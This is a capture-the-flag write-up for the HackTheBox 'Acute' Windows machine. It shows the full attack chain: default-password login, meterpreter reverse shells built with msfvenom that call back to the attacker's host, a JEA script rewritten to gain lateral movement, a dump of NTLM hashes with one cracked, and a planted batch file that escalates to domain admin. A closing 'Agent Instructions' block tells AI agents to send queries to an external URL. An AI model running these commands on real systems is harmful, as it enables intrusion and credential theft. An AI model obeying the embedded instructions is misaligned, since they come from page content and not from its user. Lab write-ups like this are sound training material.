# HTB -Acute

## Machine Info Acute is a hard Windows machine that starts with a website on port `443`. The certificate of the website reveals a domain name `atsserver.acute.local`. Looking around the website there are several employees mentioned and with this information it is possible to construct a list of possible users on the remote machine. Enumerating the website reveals a form with procedures regarding newcomers to the company. The form reveals the default password that all accounts are initially set up with. It also reveals a link for a `Windows PowerShell Web Access` (PSWA) session. Combining all the available information from the enumeration process an attacker is able to get into a PowerShell session as the user `edavies` on `Acute-PC01`. Then, it is discovered that the user `edavies` is also logged on using an interactive session. Upon spying on the actions of `edavie` the clear text password of the `imonks` user for `ATSSERVER` can be retrieved. The user `imonks` is running under `Just Enough Administration` (JEA) on `ATSSERVER`, but even with the limited command set an attacker is able to modify a script on `ATSSERVER` in order to make `edavies` a local administrator on `Acute-PC01`. Now that `edavies` is a local administrator the `HKLM\sam` and `HKLM\system` can be retrieved from the system in order to extract the password hashes of all the users. The administrator hash turns out to be crackable and the clear text password is re-used for `awallace` on `ATSSERVER`. The user `awallace` is able to create `BAT` scripts on a directory where the user `Lois` will execute them. `Lois` has the rights to add `imonks` to the `site_admin` group which in turn has right access to the `Domain Admins` group. So, after `imonks` is added to the `site_admin` group he can add himself to the `Domain Admins` group and acquire administrative privileges. ## Enumeration *** **Scope** > IP Address: 10.10.11.145 **Nmap Scan** ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade] └─$ nmap -p- --min-rate 10000 $ip -Pn PORT STATE SERVICE 443/tcp open https ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2] └─$ nmap -p -sCV $ip -oN Nmap/script-scan PORT STATE SERVICE VERSION 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found | ssl-cert: Subject: commonName=atsserver.acute.local | Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver | Not valid before: 2022-01-06T06:34:58 |_Not valid after: 2030-01-04T06:34:58 |_ssl-date: 2024-07-22T08:03:32+00:00; 0s from scanner time. |_http-server-header: Microsoft-HTTPAPI/2.0 | tls-alpn: |_ http/1.1 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` ``` * Open ports: 443 * Services: HTTPS * Important notes: DNS:atsserver.acute.local, DNS:atsserver ``` First, I added the domain name, FQDN and computer name to hosts file ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound] └─$ sudo sh -c "echo '$ip acute.local atsserver.acute.local atsserver' >> /etc/hosts" ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound] └─$ tail -n1 /etc/hosts 10.10.11.145 acute.local atsserver.acute.local atsserver ``` *** **HTTP Enumeration** subdomain enumeration didn't get anything ```BASH ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/GreenHorn] └─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.acute.local" -k -t 200 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ :: Progress: [19966/19966] :: Job [1/1] :: 208 req/sec :: Duration: [0:01:35] :: Errors: 0 :: ``` `https://acute.local/`

However, `atsserver.acute.local` has a webapp

Several users found but I need to know the format of each user.

In the top right of the page, there is a link to `.docx` file

When I clicked it, It downloaded the file to my kali machine, So I will explore it locally. Looking at the file details: ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute] └─$ exiftool New_Starter_CheckList_v7.docx Zip File Name : [Content_Types].xml Creator : FCastle Description : Created on Acute-PC01 Last Modified By : Daniel ``` The Creator of the file is `Fcastle` which is not in my users list, So I will add him first along with `Daniel` by whom the file was modified. Also, it gave us a hint that the username format is `First Letter from first name + Last name` So the user list should be like this: ``` Fcastle Awallace Chall Edavies Imonks Jmorgan Lhopkins ``` Another important thing is `Created on Acute-PC01` which tell us that there is a computer name called `Acute-PC01`. So, we have now two computer names ``` atsserver Acute-PC01 ``` I opened the docx file and it looks like this:

There are two new links that I want to explore. ``` https://atsserver.acute.local/Staff https://atsserver.acute.local/Staff/Induction ``` The two pages respond with 404

This raw tells that the default password is `Password1!` and several users have this passwords

`PSWA` means PowerShell Web Access and `dc_manage` seems to be kind of restrictions or something.

The last raw has a link when clicked it, it takes me to `https://atsserver.acute.local/Acute_Staff_Access`

At the end, I can see that there is a group with name `site admin` and `Lois` has control of it.

## **Shell ad Edavies** `https://atsserver.acute.local/Acute_Staff_Access`

It's a PowerShell web Access Console, I have the password, two computer names and several users. I will try them. When providing wrong credentials, this message appears

A new message appears with user `Chall` says that we aren't authorized to connect to that computer name, So I will try the other one.

When I changed the computer name to `Acute-PC01` and try to authenticate with `chall`, it also failed However, when tried with `Edavies` it took me to the PowerShell Console.

`Jmorgan` & `Natasha` exists on the machine along with `edavies`. ```bash PS C:\Users> dir Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/21/2021 1:01 PM administrator.ACUTE d----- 12/22/2021 1:26 AM edavies d----- 12/21/2021 10:50 PM jmorgan d----- 11/19/2021 9:29 AM Natasha d-r--- 11/18/2020 11:43 PM Public ``` ```powershell PS C:\Users> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============ ============================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled g roup BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled g roup BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled g roup NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled g roup NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled g roup NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled g roup Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled g roup Mandatory Label\Medium Mandatory Level Label S-1-16-8192 ``` I want to see who is a member on `Remote Managment users` but when asked the domain it failed, So I switch to query local group and got a result ```bash PS C:\Users> net group "Remote Management Users" net : This command can be used only on a Windows Domain Controller. + CategoryInfo : NotSpecified: (This command ca...ain Controller.:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError More help is available by typing NET HELPMSG 3515. PS C:\Users> net localgroup "Remote Management Users" Members ------------------------------------------------------------------------------- ACUTE\edavies The command completed successfully. ``` I also looked at `administrators` group and I found that `Jmorgan` is a member of it. ```PowerShell PS C:\Users> net localgroup "administrators" Members ------------------------------------------------------------------------------- ACUTE\Domain Admins ACUTE\jmorgan Administrator ``` I need to upgrade my shell, So I can use `nc` or `meterpreter` shell. In our situation, `meterpreter` shell is better and we will know why after few steps. At root file system, there is a non-standard folder `Utils` ```PowerShell PS C:\> dir Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/7/2019 9:14 AM PerfLogs d-r--- 12/6/2021 11:06 AM Program Files d-r--- 12/7/2021 12:43 PM Program Files (x86) d-r--- 12/21/2021 10:50 PM Users d----- 1/31/2022 12:29 AM Utils d----- 12/16/2021 1:23 AM Windows ``` Viewing the folder permission, I found the `edavies` has `(M) modify` permission which means he can `Read, Wirte, Execute, Delete`. ```PowerShell PS C:\> icacls Utils Utils NT AUTHORITY\SYSTEM:(OI)(CI)(F) BUILTIN\Administrators:(OI)(CI)(F) ACUTE\edavies:(OI)(CI)(M) BUILTIN\Users:(OI)(CI)(R) ``` I don't know why this folder exists but I will continue from this folder as I have permissions on it. Creating a `meterpreter` shell ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute] └─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=443 -f exe -o shell.exe Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: shell.exe ``` Starting `MetaSploit` framework and start listening ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute] └─$ msfconsole -q msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 10.10.16.7 msf6 exploit(multi/handler) > set lport 443 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.16.7:443 ``` Download the shell and execute it. ```PowerShell PS C:\Utils> curl 10.10.16.7/shell.exe -o .\shell.exe PS C:\Utils> .\shell.exe ``` Receiving a connection back ```bash [*] Sending stage (201798 bytes) to 10.10.11.145 [*] Meterpreter session 1 opened (10.10.16.7:443 -> 10.10.11.145:49848) at 2024-07-22 05:06:10 -0400 meterpreter > getuid Server username: ACUTE\edavies ``` ## **Shell as imonks** > Personally, I didn't know what to do next as no escalation path was clear to me, So I got a hint that you can use `screenshare` feature from `meterpreter` session to capture desktop screenshot. ```bash meterpreter > screenshare [*] Preparing player... [*] Opening player at: /home/kali/study/Courses/HackThebox/HTB/machines/Acute/UjBPiFCw.html [*] Streaming... ``` An html page is opened, and I waited for something can be useful

If you get error like this: ```bash [-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact --timeout ``` use the following command: ```bash meterpreter > screenshare --interact 1 --timeout 30000 ``` After few moments, A new PowerShell console is opened, and several commands is entered

```powershell Enter-PSsession -Computername atsserver $passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("acute\imonks", $passwd) ``` I now get new user credentials `imonks:W3_4R3_th3_f0rce.` I also notice that when tried to connect with `PSSession` it failed, and it used `dc_manage` configuration file. At meterpreter, I started a shell and try to execute command as `imonks` ```powershell $passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("acute\imonks", $passwd) ``` `Enter-PSSession` failed as we saw in screenshot, So I will try `Invoke-Command` and successfully :) ```powershell PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {whoami} acute\imonks ``` ```powershell Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls -Recurse C:\Users\imonks} Directory: C:\Users\imonks Mode LastWriteTime Length Name PSComputerName ---- ------------- ------ ---- -------------- d-r--- 21/12/2021 22:29 Desktop atsserver d-r--- 21/12/2021 16:01 Documents atsserver d-r--- 15/09/2018 08:12 Downloads atsserver d-r--- 15/09/2018 08:12 Favorites atsserver d-r--- 15/09/2018 08:12 Links atsserver d-r--- 15/09/2018 08:12 Music atsserver d-r--- 15/09/2018 08:12 Pictures atsserver d----- 15/09/2018 08:12 Saved Games atsserver d-r--- 15/09/2018 08:12 Videos atsserver Directory: C:\Users\imonks\Desktop Mode LastWriteTime Length Name PSComputerName ---- ------------- ------ ---- -------------- -ar--- 22/07/2024 08:58 34 user.txt atsserver -a---- 11/01/2022 18:04 602 wm.ps1 atsserver ``` The user flag is there along with `wm.ps1` file. ```PowerShell Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\user.txt} 42fd899d0cffc822513f80xxxxxxxxxxxxx ``` > User Flag: 42fd899d0cffc822513xxxxxxxxxxxxx ## **Shell as Jmorgan** `wm.ps1` contain PowerShell Credentials of `Jmorgan` user which we know that he is local admin at `Acute-PC01` ```powershell Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1} $securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51' $passwd = $securepasswd | ConvertTo-SecureString $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds ``` I couldn't run the script as it as `Edavies` because he isn't the user that creates this file, So I will try to run the script as `imonks` to get a shell as `jmorgan`. But first I will modify this script to send me a shell. Creating meterpreter shell to receive connection as `jmorgan` ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute] └─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=8443 -f exe -o jmorgan.exe Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: jmorgan.exe ``` Start to listen with `MetaSploit` ```bash msf6 exploit(multi/handler) > run -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.10.16.7:8443 msf6 exploit(multi/handler) > jobs Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://10.10.16.7:8443 ``` I want to modify the `wm.ps1` script, So I typed `Get-Commnad` to see available commands I can run ```powershell PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Command} CommandType Name Version Source PSComputerName ----------- ---- ------- ------ -------------- Cmdlet Get-Alias 3.1.0.0 Microsoft.PowerSh... atsserver Cmdlet Get-ChildItem 3.1.0.0 Microsoft.PowerSh... atsserver Cmdlet Get-Command 3.0.0.0 Microsoft.PowerSh... atsserver Cmdlet Get-Content 3.1.0.0 Microsoft.PowerSh... atsserver Cmdlet Get-Location 3.1.0.0 Microsoft.PowerSh... atsserver Cmdlet Set-Content 3.1.0.0 Microsoft.PowerSh... atsserver Cmdlet Set-Location 3.1.0.0 Microsoft.PowerSh... atsserver Cmdlet Write-Output 3.1.0.0 Microsoft.PowerSh... atsserver PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Alias} CommandType Name Version Source PSComputerName ----------- ---- ------- ------ -------------- Alias cat -> Get-Content atsserver Alias cd -> Set-Location atsserver Alias echo -> Write-Output atsserver Alias ls -> Get-ChildItem atsserver Alias pwd -> Get-Location atsserver Alias sc -> Set-Content atsserver Alias type -> Get-Content atsserver ``` I will use `Set-Content` to add the following lines to the script ```powershell Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Set-Content -Value '$securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51" $passwd = $securepasswd | ConvertTo-SecureString $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) Invoke-Command -ScriptBlock {PowerShell -c C:\Utils\jmorgan.exe} -ComputerName Acute-PC01 -Credential $creds' -Path C:\Users\imonks\Desktop\wm.ps1} ``` Check everything is correct ```powershell Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1} $securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51" $passwd = $securepasswd | ConvertTo-SecureString $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) Invoke-Command -ScriptBlock {PowerShell -c C:\Utils\jmorgan.exe} -ComputerName Acute-PC01 -Credential $creds ``` Trigger the Script ```powershell Invoke-Command -Credential $cred -ComputerName atsserver -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1} [*] Sending stage (201798 bytes) to 10.10.11.145 [*] Meterpreter session 2 opened (10.10.16.7:8443 -> 10.10.11.145:49786) at 2024-07-22 06:04:23 -0400 ``` ```bash msf6 exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.7:443 -> 10.10.11.145:49848 (172.16.22.2) 2 meterpreter x64/windows ACUTE\jmorgan @ ACUTE-PC01 10.10.16.7:8443 -> 10.10.11.145:49786 (172.16.22.2) msf6 exploit(multi/handler) > sessions 2 [*] Starting interaction with 2... meterpreter > getuid Server username: ACUTE\jmorgan ``` ```powershell PS C:\Users\jmorgan\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ========================================= ================================================================== ======= SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeUndockPrivilege Remove computer from docking station Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled ``` **Shell as awallace** I will use `hashdump` feature to dump hashes and try to crack it ```PowerShell meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740::: ``` Only Administrator hash was cracked using `https://crackstation.net/`

I want to know which users exists on `atsserver` ```powershell Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls C:\Users} Directory: C:\Users Mode LastWriteTime Length Name PSComputerName ---- ------------- ------ ---- -------------- d----- 20/12/2021 23:30 .NET v4.5 atsserver d----- 20/12/2021 23:30 .NET v4.5 Classic atsserver d----- 20/12/2021 20:38 Administrator atsserver d----- 21/12/2021 23:31 awallace atsserver d----- 21/12/2021 16:01 imonks atsserver d----- 22/12/2021 00:11 lhopkins atsserver d-r--- 20/12/2021 20:38 Public atsserver ``` I will try to authenticate as these users with the password of administrator I cracked ```powershell $password = ConvertTo-SecureString -AsplainText -Force 'Password@123' $Credential = New-Object System.Management.Automation.PSCredential("acute\awallace", $password) ``` A got a hit with `awallace` user ```powershell PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {whoami} acute\awallace ``` I tried to enumerate programs folder before with `imoks` but got `Access Denied`, So I will enumerate them again but with `awllace` user ```powershell Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls "C:\Program Files"} Directory: C:\Program Files Mode LastWriteTime Length Name PSComputerName ---- ------------- ------ ---- -------------- d----- 21/12/2021 00:04 common files atsserver d----- 21/12/2021 00:11 Hyper-V atsserver d----- 15/09/2018 08:12 internet explorer atsserver d----- 01/02/2022 19:41 keepmeon atsserver d----- 21/12/2021 00:04 VMware atsserver d----- 20/12/2021 21:19 Windows Defender atsserver d----- 20/12/2021 21:12 Windows Defender Advanced Threat atsserver Protection d----- 21/12/2021 14:13 WindowsPowerShell atsserver ``` I will look again at `keepmeon` this time ```powershell PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls "C:\Program Files\keepmeon"} Directory: C:\Program Files\keepmeon Mode LastWriteTime Length Name PSComputerName ---- ------------- ------ ---- -------------- -a---- 21/12/2021 14:57 128 keepmeon.bat atsserver ``` Listing the content of the file gives this script ```powershell PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat "C:\Program Files\keepmeon\keepmeon.bat"} REM This is run every 5 minutes. For Lois use ONLY @echo off for /R %%x in (*.bat) do ( if not "%%x" == "%~0" call "%%x" ) ``` Asking ChatGPT about the exact function of that script:

So, I can create `.bat` file and get it executed after 5 minutes as `Lois` the comment says. We also saw that `Lois` is the only user who can add members to `Site_admin` groups, So I will add jmorgan to that groups and get `Domain Admins` privileges

The comment field says that the `site_admin` group has access to `domain admins` ```powershell PS C:Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin} Group name Site_Admin Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group Members ------------------------------------------------------------------------------- The command completed successfully. ``` Write a `.bat` file to add `awallace` to `site_admin` ```powershell Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Set-Content -Value 'net group site_admin awallace /add /domain' -Path "C:\Program Files\keepmeon\blind0bandit.bat"} ``` After few minutes, the user is added ```powershell Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin} Group name Site_Admin Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group Members ------------------------------------------------------------------------------- awallace The command completed successfully. ``` ```powershell Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\Administrator\Desktop\root.txt} d078dca1007c6bcdc86xxxxxxxxxxxxxxx ``` > Root Flag: d078dca1007c6bcdxxxxxxxxxxxxxxxx --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blind0bandit.gitbook.io/blog/windows-machines/hard/htb-acute.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.